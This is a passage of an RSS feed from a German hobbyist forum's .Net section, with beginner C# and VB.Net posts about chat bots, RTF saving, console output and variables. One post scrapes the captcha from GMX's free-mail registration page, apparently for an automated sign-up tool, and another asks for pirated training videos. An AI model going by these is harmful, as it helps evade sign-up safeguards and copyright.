&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; } while (map.IsFieldBlocked(c.x, c.y - 1));<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; else<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; c.y--;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; rtnList.Add(new Int32[] { c.x, c.y });<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(&quot;[!] ZIEL ERREICHT (&quot; + c.x.ToString() + &quot;:&quot; + c.y.ToString() + &quot;)&quot;);<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return rtnList;<br />
&nbsp; &nbsp; &nbsp; &nbsp; }</code><hr />
</div>
</div>
</div>
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Raumi</dc:creator>
			<guid isPermaLink="true">net-94/pathfinder-11173</guid>
		</item>
		<item>
			<title><![CDATA[C# [Suche] Mentor]]></title>
			<link>net-94/suche-mentor-10793?goto=newpost</link>
			<pubDate>Fri, 13 Apr 2012 11:30:21 GMT</pubDate>
			<description>Hey, ich wusste nich wohin ich das posten sollte..also wenn es der falsche Sub ist, dann bitte verschieben. 
 
Kommen wir zur Sache. Also ich suche...</description>
			<content:encoded><![CDATA[<div>Hey, ich wusste nich wohin ich das posten sollte..also wenn es der falsche Sub ist, dann bitte verschieben.<br />
<br />
Kommen wir zur Sache. Also ich suche einen, der mir die Nuddelsprogrammierung naeher bringt, sprich mit mir zB an einem einfach Bot oder so herumbastelt. Sei es mit der KNLibrary oder mit dem KDV von Sky..Es muss nicht einer, sein, der das schon perfekt kann, Anfaenger, wie ich, koennen sich auch melden..Ich bin halt der Meinung, dass man dadurch viel schneller und effekticer lernt. :)<br />
<br />
Also hat wer Bock? <br />
Gecodet wird in C Sharp.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/suche-mentor-10793</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [Problem] - Nick soll bei ChannelJoin offline gehen!]]></title>
			<link>net-94/problem-nick-soll-bei-channeljoin-offline-gehen-10694?goto=newpost</link>
			<pubDate>Wed, 11 Apr 2012 17:54:46 GMT</pubDate>
			<description>HiHo, 
 
habe folgendes Problem und zwar will ich, 
dass mein *Bot offline* geht, *sobald jemand* (d.h. egal wer) den *Channel betritt*. 
 
Aber das...</description>
			<content:encoded><![CDATA[<div>HiHo,<br />
<br />
habe folgendes Problem und zwar will ich,<br />
dass mein <b>Bot offline</b> geht, <b>sobald jemand</b> (d.h. egal wer) den <b>Channel betritt</b>.<br />
<br />
Aber das Problem ist:<br />
ich komme bei meinem Code nicht weiter:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">If&nbsp;</span><span style="color: #DD0000">'Dieser&nbsp;Teil&nbsp;fehlt&nbsp;mir&nbsp;xD'&nbsp;</span><span style="color: #0000BB">Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;client</span><span style="color: #007700">.</span><span style="color: #0000BB">Disconnect</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;</span><span style="color: #007700">If&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Klar, sieht jetzt so aus, <br />
als ob ich's nicht schon selbst probiert hätte,<br />
aber das täuscht.<br />
<br />
Ich komme einfach nicht weiter,<br />
deswegen hoffe ich auf eure Hilfe. :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Pyromane</dc:creator>
			<guid isPermaLink="true">net-94/problem-nick-soll-bei-channeljoin-offline-gehen-10694</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [Problem] - Richtextbox - Farbig speichern als rtf]]></title>
			<link>net-94/problem-richtextbox-farbig-speichern-als-rtf-10609?goto=newpost</link>
			<pubDate>Tue, 10 Apr 2012 13:18:40 GMT</pubDate>
			<description>Hallo/Nabend, 
 
 
Meine Richtextbox ist Bunt an Texten:  
Blau, Rot, Dick, Unterstrichen, usw... 
 
So, beim speichern des Textes in einer RTF-Datei...</description>
			<content:encoded><![CDATA[<div>Hallo/Nabend,<br />
<br />
<br />
Meine Richtextbox ist Bunt an Texten: <br />
Blau, Rot, Dick, Unterstrichen, usw...<br />
<br />
So, beim speichern des Textes in einer RTF-Datei habe ich keine Probleme.<br />
<br />
Aber das Problem ist, er speichert es nur im Standart-Format ab.<br />
Heißt: <br />
Die Schrift bleibt schwarz und <br />
ist <b>nicht</b> Blau, Rot, Dick, usw.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;writer&nbsp;</span><span style="color: #007700">As&nbsp;New&nbsp;</span><span style="color: #0000BB">StreamWriter</span><span style="color: #007700">(</span><span style="color: #DD0000">"Einstellungen/Verlauf.rtf"</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">writer</span><span style="color: #007700">.</span><span style="color: #0000BB">WriteLine</span><span style="color: #007700">(</span><span style="color: #0000BB">RichTextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">writer</span><span style="color: #007700">.</span><span style="color: #0000BB">Close</span><span style="color: #007700">()&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Wie stelle ich es nun an, <br />
dass er den Text <br />
farbig in einer RTF-Datei abspeichert?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Pyromane</dc:creator>
			<guid isPermaLink="true">net-94/problem-richtextbox-farbig-speichern-als-rtf-10609</guid>
		</item>
		<item>
			<title>C# U-Hacks Logo</title>
			<link>net-94/u-hacks-logo-10589?goto=newpost</link>
			<pubDate>Tue, 10 Apr 2012 09:27:04 GMT</pubDate>
			<description><![CDATA[Hey, da vlt viele von euch das U-Hacks "Logo" in ihrer Konsolenaufgabe verwenden wollen, habe ich euch die Arbeit genommen und poste hier nun den...]]></description>
			<content:encoded><![CDATA[<div>Hey, da vlt viele von euch das U-Hacks &quot;Logo&quot; in ihrer Konsolenaufgabe verwenden wollen, habe ich euch die Arbeit genommen und poste hier nun den Sourcecode. :)<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Collections</span><span style="color: #007700">.</span><span style="color: #0000BB">Generic</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Linq</span><span style="color: #007700">;<br /></span><span style="color: #0000BB">using&nbsp;System</span><span style="color: #007700">.</span><span style="color: #0000BB">Text</span><span style="color: #007700">;<br /><br />namespace&nbsp;</span><span style="color: #0000BB">UHackslogo<br /></span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;class&nbsp;</span><span style="color: #0000BB">Program<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;static&nbsp;</span><span style="color: #0000BB">void&nbsp;Main</span><span style="color: #007700">(</span><span style="color: #0000BB">string</span><span style="color: #007700">&#91;&#93;&nbsp;</span><span style="color: #0000BB">args</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">Title&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"U-Hackslogo&nbsp;by&nbsp;Saad&nbsp;-&nbsp;Visit&nbsp;U-Hacks.net&nbsp;!"</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(</span><span style="color: #DD0000">"-----------------------------------------------------------"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">ForegroundColor&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ConsoleColor</span><span style="color: #007700">.</span><span style="color: #0000BB">Blue</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(@</span><span style="color: #DD0000">"&nbsp;____&nbsp;___&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;___&nbsp;___&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;__&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(@</span><span style="color: #DD0000">"|&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;\&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;\_____&nbsp;&nbsp;&nbsp;&nbsp;____&nbsp;|&nbsp;&nbsp;|&nbsp;__&nbsp;&nbsp;______"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(@</span><span style="color: #DD0000">"|&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;______&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;~&nbsp;&nbsp;&nbsp;&nbsp;\__&nbsp;&nbsp;\&nbsp;_/&nbsp;___\|&nbsp;&nbsp;|/&nbsp;/&nbsp;/&nbsp;&nbsp;___/"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(@</span><span style="color: #DD0000">"|&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;/&nbsp;&nbsp;/_____/&nbsp;\&nbsp;&nbsp;&nbsp;&nbsp;Y&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;__&nbsp;\\&nbsp;&nbsp;\___|&nbsp;&nbsp;&nbsp;&nbsp;&lt;&nbsp;&nbsp;\___&nbsp;\&nbsp;"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(@</span><span style="color: #DD0000">"|______/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\___|_&nbsp;&nbsp;/(____&nbsp;&nbsp;/\___&nbsp;&nbsp;&gt;__|_&nbsp;\/____&nbsp;&nbsp;&gt;"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(@</span><span style="color: #DD0000">"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\/&nbsp;"</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">ResetColor</span><span style="color: #007700">();<br /></span><span style="color: #0000BB">WriteCenter</span><span style="color: #007700">(</span><span style="color: #DD0000">"-----------------------------------------------------------"</span><span style="color: #007700">);<br />}<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;public&nbsp;static&nbsp;</span><span style="color: #0000BB">void&nbsp;WriteCenter</span><span style="color: #007700">(</span><span style="color: #0000BB">string&nbsp;text</span><span style="color: #007700">)<br /><br />{<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">SetCursorPosition</span><span style="color: #007700">(</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">WindowWidth</span><span style="color: #007700">/</span><span style="color: #0000BB">2&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">text</span><span style="color: #007700">.</span><span style="color: #0000BB">Length&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">CursorTop</span><span style="color: #007700">);<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">Console</span><span style="color: #007700">.</span><span style="color: #0000BB">WriteLine</span><span style="color: #007700">(</span><span style="color: #0000BB">text</span><span style="color: #007700">);<br />}&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/u-hacks-logo-10589</guid>
		</item>
		<item>
			<title>Bot schmiert schon beim starten ab :mad:</title>
			<link>net-94/bot-schmiert-schon-beim-starten-ab-mad-10528?goto=newpost</link>
			<pubDate>Mon, 09 Apr 2012 13:43:09 GMT</pubDate>
			<description>Topic  
wieso zum teufel klappt es nicht: 
Bild: https://u-img.net/img/6007Pl_thumb.png  (https://u-img.net/img/6007Pl.png)  
 
Teil vom Source auf...</description>
			<content:encoded><![CDATA[<div>Topic <br />
wieso zum teufel klappt es nicht:<br />
<a href="https://u-img.net/img/6007Pl.png" target="_blank"><img src="https://u-img.net/img/6007Pl_thumb.png" border="0" alt="" /></a> <br />
<br />
Teil vom Source auf dem screen zu sehen<br />
Bitte helft mir</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/bot-schmiert-schon-beim-starten-ab-mad-10528</guid>
		</item>
		<item>
			<title>VB.Net Imagebox zeigt Bild nicht an</title>
			<link>net-94/imagebox-zeigt-bild-nicht-an-10363?goto=newpost</link>
			<pubDate>Sat, 07 Apr 2012 09:11:23 GMT</pubDate>
			<description>Hey, 
Nachdem ich es geschafft habe die Captcha ID aus dem Quelltext rauszufiltern wollte ich das Bild in einer Imagebox anzeigen. 
 
Mein Code: 
...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
Nachdem ich es geschafft habe die Captcha ID aus dem Quelltext rauszufiltern wollte ich das Bild in einer Imagebox anzeigen.<br />
<br />
Mein Code:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Button1_Click</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;Button1</span><span style="color: #007700">.</span><span style="color: #0000BB">Click<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;CaptchaId&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">Regex</span><span style="color: #007700">.</span><span style="color: #0000BB">Match</span><span style="color: #007700">(</span><span style="color: #0000BB">WebBrowser1</span><span style="color: #007700">.</span><span style="color: #0000BB">DocumentText</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"image&amp;amp;antiCache=(&#91;^""&#93;+)"</span><span style="color: #007700">).</span><span style="color: #0000BB">Groups</span><span style="color: #007700">(</span><span style="color: #0000BB">1</span><span style="color: #007700">).</span><span style="color: #0000BB">Value<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;imagepfad&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">String<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;imagepfad&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"http://www.gmx.ch/mail/freemail/registrierung/wicket/page?0-IResourceListener-bodyContainer-brand~container~border-brand~container~border_body-signup~form-form-captchaPanel-captcha~image-captcha~image&amp;amp;antiCache="&nbsp;</span><span style="color: #007700">&amp;&nbsp;</span><span style="color: #0000BB">CaptchaId<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;webclient&nbsp;</span><span style="color: #007700">As&nbsp;New&nbsp;</span><span style="color: #0000BB">WebClient<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PictureBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">ImageLocation&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">imagepfad<br /><br /><br /><br /><br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub&nbsp;<br /></span>
</span>
</code></code><hr />
</div>Mir wird kein Bild angezeigt, nur so ein X.<br />
Was mach ich falsch?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/imagebox-zeigt-bild-nicht-an-10363</guid>
		</item>
		<item>
			<title>VB.Net Captcha aus Quelltext Zeile auslesen</title>
			<link>net-94/captcha-aus-quelltext-zeile-auslesen-10344?goto=newpost</link>
			<pubDate>Fri, 06 Apr 2012 17:27:03 GMT</pubDate>
			<description>Hey, 
Ich möchte für ein Programm welches ich momentan programmiere ein Captcha auslesen und in einer Picture Box anzeigen. 
Ich habe dabei schon...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
Ich möchte für ein Programm welches ich momentan programmiere ein Captcha auslesen und in einer Picture Box anzeigen.<br />
Ich habe dabei schon eine Vorstellung:<br />
1.) Quelltext öffnen auslesen<br />
2.) Quelltext nach bestimmter Zeile durchsuchen<br />
2.) Regexen<br />
<br />
Ich weiß nicht wirklich wie ich es machen soll.<br />
Die Zeile sieht so aus:<br />
<img src="http://www.apload.de/images-i170521b2s9ec.png" border="0" alt="" /><br />
<br />
Hoffe mir kann jemand helfen hihio.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/captcha-aus-quelltext-zeile-auslesen-10344</guid>
		</item>
		<item>
			<title>VB.Net Visual Basic 2010 Grundlagen lernen</title>
			<link>net-94/visual-basic-2010-grundlagen-lernen-10296?goto=newpost</link>
			<pubDate>Thu, 05 Apr 2012 18:37:00 GMT</pubDate>
			<description>Hallo Leute. 
Für die, die schon immer Visual Basic 2010 lernen wolten kann ich euch nur diese Tutorial Reihe (Tutorial Reihe zusammen oder...</description>
			<content:encoded><![CDATA[<div>Hallo Leute.<br />
Für die, die schon immer Visual Basic 2010 lernen wolten kann ich euch nur diese Tutorial Reihe (Tutorial Reihe zusammen oder getrennt?) ans Herz legen:<br />
<a href="http://www.microsoft.com/germany/msdn/beginner/videos/basics/default.aspx" target="_blank" rel="nofollow">Videos: Grundlagen der Programmierung</a><br />
<br />
Diese Tutorial Reihe ist Idioten sicher erklärt und bezieht sich auf die Consolen Anwendungen in Visual Basic.<br />
<br />
Für die die zu faul sind zu lesen ;)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/visual-basic-2010-grundlagen-lernen-10296</guid>
		</item>
		<item>
			<title>C# Mittig schreiben</title>
			<link>net-94/mittig-schreiben-10253?goto=newpost</link>
			<pubDate>Wed, 04 Apr 2012 20:40:20 GMT</pubDate>
			<description><![CDATA[Jo Leute ! 
 
Ich wollte mal fragen, wie man in einer Konsole einen Text mittig ausrichtet. 
Z.B wuerde ich gerne das ''U-Hacks'' von diesem Programm...]]></description>
			<content:encoded><![CDATA[<div>Jo Leute !<br />
<br />
Ich wollte mal fragen, wie man in einer Konsole einen Text mittig ausrichtet.<br />
Z.B wuerde ich gerne das ''U-Hacks'' von diesem Programm hier in der Mitte stehen haben --&gt; u-hacks.net/showroom-102/rl-bin-ich-ein-suchty-10082/</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/mittig-schreiben-10253</guid>
		</item>
		<item>
			<title>VB.Net Variablen</title>
			<link>net-94/variablen-10251?goto=newpost</link>
			<pubDate>Wed, 04 Apr 2012 20:17:23 GMT</pubDate>
			<description>Extra für den lieben Stardunk, weil er Variablen nicht versteht (mit super Beispielen). 
 
 
Code: 
--------- 
Public Class Variablen 
 
    Dim str...</description>
			<content:encoded><![CDATA[<div>Extra für den lieben Stardunk, weil er Variablen nicht versteht (mit super Beispielen).<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Public Class Variablen<br />
<br />
&nbsp; &nbsp; Dim str As String = &quot;Ich bin ein String&quot;<br />
&nbsp; &nbsp; 'Zeichenkette, also beliebig viele Buchstaben und Ziffern<br />
<br />
&nbsp; &nbsp; Dim chr As Char = &quot;I&quot;<br />
&nbsp; &nbsp; 'nur ein Zeichen<br />
<br />
&nbsp; &nbsp; Dim byt As Byte = 250<br />
&nbsp; &nbsp; 'ganze Zahl zwischen 0 und 255<br />
<br />
&nbsp; &nbsp; Dim shrt As Short = 30000<br />
&nbsp; &nbsp; 'ganze Zahl zwischen -32.768 und 32.767 <br />
<br />
&nbsp; &nbsp; Dim int As Integer = 2000000000<br />
&nbsp; &nbsp; 'ganze Zahl zwischen –2.147.483.648 und 2.147.483.647 <br />
<br />
&nbsp; &nbsp; Dim lng As Long = 8000000000000000000<br />
&nbsp; &nbsp; 'ganze Zahl zwischen –9.223.372.036.854.775.808 und 9.223.372.036.854.775.807 <br />
<br />
&nbsp; &nbsp; Dim sngl As Single = 90.4<br />
&nbsp; &nbsp; 'einfach genaue Fließkommazahl <br />
<br />
&nbsp; &nbsp; Dim bln As Boolean = False<br />
&nbsp; &nbsp; '»Wahr« oder »Falsch« <br />
<br />
<br />
#Region &quot;Beispiele&quot;<br />
<br />
&nbsp; &nbsp; 'Du willst deinen Namen speichern?<br />
&nbsp; &nbsp; 'String! Richtig.<br />
&nbsp; &nbsp; Dim Vorname As String = &quot;Nico&quot;<br />
<br />
&nbsp; &nbsp; 'Du willst den Anfangsbuchstaben von deinem Vornamen speichern?<br />
&nbsp; &nbsp; 'Char! Richtig.<br />
&nbsp; &nbsp; Dim Anfangsbuchstabe As Char = &quot;N&quot;<br />
<br />
&nbsp; &nbsp; 'Du willst dein Alter speichern?<br />
&nbsp; &nbsp; 'Byte! Richtig.<br />
&nbsp; &nbsp; Dim Alter As Byte = 18<br />
<br />
&nbsp; &nbsp; 'Du willst die dein Gewicht speichern?<br />
&nbsp; &nbsp; 'Short! Richtig.<br />
&nbsp; &nbsp; Dim Gewicht As Short = 350<br />
<br />
&nbsp; &nbsp; 'Du willst eine Postleitzahl speichern?<br />
&nbsp; &nbsp; 'Integer! Richtig.<br />
&nbsp; &nbsp; Dim PLZ As Integer = 13337<br />
<br />
&nbsp; &nbsp; 'Du willst meinen Kontostand speichern?<br />
&nbsp; &nbsp; 'Long! Richtig.<br />
&nbsp; &nbsp; Dim Kontostand As Long = 223372036854775807<br />
<br />
&nbsp; &nbsp; 'Du willst deinen Notendurchschnitt speichern?<br />
&nbsp; &nbsp; 'Single! Richtig.<br />
&nbsp; &nbsp; Dim Notendurchschnitt As Single = 5.9<br />
<br />
&nbsp; &nbsp; 'Du willst speichern ob du ein Mann bist?<br />
&nbsp; &nbsp; 'Boolean! Richtig.<br />
&nbsp; &nbsp; Dim IstEinMann As Boolean = False<br />
<br />
#End Region<br />
End Class</code><hr />
</div>LG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/variablen-10251</guid>
		</item>
		<item>
			<title>Video 2 brain ?</title>
			<link>net-94/video-2-brain-10236?goto=newpost</link>
			<pubDate>Wed, 04 Apr 2012 15:22:37 GMT</pubDate>
			<description>Hallo !!! 
Hat jmd vill noch das video 2 brain c# oder sogar noch vb.net und kann mir denn download schicken es ist für nen freund von mir :). 
...</description>
			<content:encoded><![CDATA[<div>Hallo !!!<br />
Hat jmd vill noch das video 2 brain c# oder sogar noch vb.net und kann mir denn download schicken es ist für nen freund von mir :).<br />
<br />
danke im vorraus</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>DnL</dc:creator>
			<guid isPermaLink="true">net-94/video-2-brain-10236</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [Source] Frag die magische Miesmuschel]]></title>
			<link>net-94/source-frag-magische-miesmuschel-10166?goto=newpost</link>
			<pubDate>Tue, 03 Apr 2012 10:21:33 GMT</pubDate>
			<description>Hey, 
Ist grade aus Langeweile entstanden. 
Aufwand: 2 Minuten 
Source: 
 
PHP: 
--------- 
 
Public Class Form1</description>
			<content:encoded><![CDATA[<div>Hey,<br />
Ist grade aus Langeweile entstanden.<br />
